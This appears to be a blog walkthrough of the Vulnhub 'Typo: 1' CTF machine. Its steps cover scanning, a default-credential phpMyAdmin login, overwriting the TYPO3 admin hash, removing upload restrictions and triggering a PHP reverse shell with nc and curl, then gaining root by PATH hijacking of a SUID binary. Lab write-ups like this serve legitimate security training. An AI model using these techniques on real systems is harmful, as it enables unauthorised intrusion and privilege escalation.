Typo: 1 Walkthrough Vulnhub

|

In This Post we are solving another Vulnhub CTF Typo: 1 is made by Akanksha Sachin Verma. This VM is boot to root challenge. and VM’s goal is to Get the root flag of the target. you can download here this VM Machine.

Description

This VM is an intermediate level and you will enjoy while playing with its services and the privileges. There are things which you will learn with this box.

Network Scanning

We start with netdiscover scanning our network and find VM IP address.

netdiscover
Typo: 1 Walkthrough Vulnhub | Typo: 1 Writeup Vulnhub

Now we have our target IP address our next step is scanning the IP address ports,OS Version and services using the nmap aggressive scan.

nmap -A 192.168.43.138
Typo: 1 Walkthrough Vulnhub | Typo: 1 Writeup Vulnhub

Nmap output is show targes ports and running services and we see many HTTP ports are open target machine. like 21SSH, 80HTTP, 8000HTTP, 8080HTTP, 8081HTTP.

Now we decided to perfom directory bruteforce on each port one by one using dirb directory scanner.

Typo: 1 Walkthrough Vulnhub | Typo: 1 Writeup Vulnhub

and we run second scan for port 8081

here we found a phpmyadmin URL and our first scan we found typo3 CMS URL

First, we open the PHPMyAdmin URL and we try command password for login and us successful login with root username and root password.

Typo: 1 Walkthrough Vulnhub | Typo: 1 Writeup Vulnhub

and we go to the TYPO3 database and in this database table be_users we found 2 user entries we copy the hash our local system and try brute force and we fail to decrypt the hashes.

after try all brute-force attack we decide to generate new password hash for admin account

and we replace the hash our new generate hash for admin user

and we go to login typo3 here we put our new password and username admin and we login successfully administrator account

Typo: 1 Walkthrough Vulnhub | Typo: 1 Writeup Vulnhub

we decided to upload a shell but here file with php and many other extensions are restricted then we go to configuration Settings => Configure Installation-Wide Options => Backend(BE) => and here we see the file deny pattern rule remove everything and write the configuration.

Typo: 1 Walkthrough Vulnhub | Typo: 1 Writeup Vulnhub
PHP Shell upload typo3 cms

and again try to upload a PHP shell and we see a successful message you file is uploaded

PHP Shell upload typo3 cms

First we start start the net-cat listener and using the curl we can execute our payload

nc -lvvp 4545
curl -v http://192.168.43.18/fileadmin/shell.php

and we receive reverse connection target machine but our current shell is www-data is low privilege

PHP Shell upload typo3 cms

After enumeration the machine we didn’t find anything then we move on privilege Escalation we check the SUID binary file using the find command

  • / root => directory
  • -type f => output type is only file
  • -perm => -u=s users SUID Bits
  • 2>/dev/null => redirect all error null ( Standard error )

and we see a interested SUID binary file first we run the command but we didn’t see any output then we reading the binary file using the strings command

Privilege Escalation

after reading the code we see a function and this function is restarted apache2 server it’s clear that if we run apache2-restart then user root is executing the command service apache2 start

so here we can think to change the PATH variable and can obtain the root shell. let’s try with changing our current directory to /tmp directory

echo "/bin/bash" > service
chmod +x service
Exporting PATH

changing our current path to /tmp directory using the command

export PATH=/tmp/:$PATH
apache2-restart
id
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /root

and we get our last root flag target root directory.

ls
cat proof.txt

Minouche 1 Vulnhub Walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

One Comment on “Typo: 1 Walkthrough Vulnhub”

Leave a Reply

Your email address will not be published. Required fields are marked *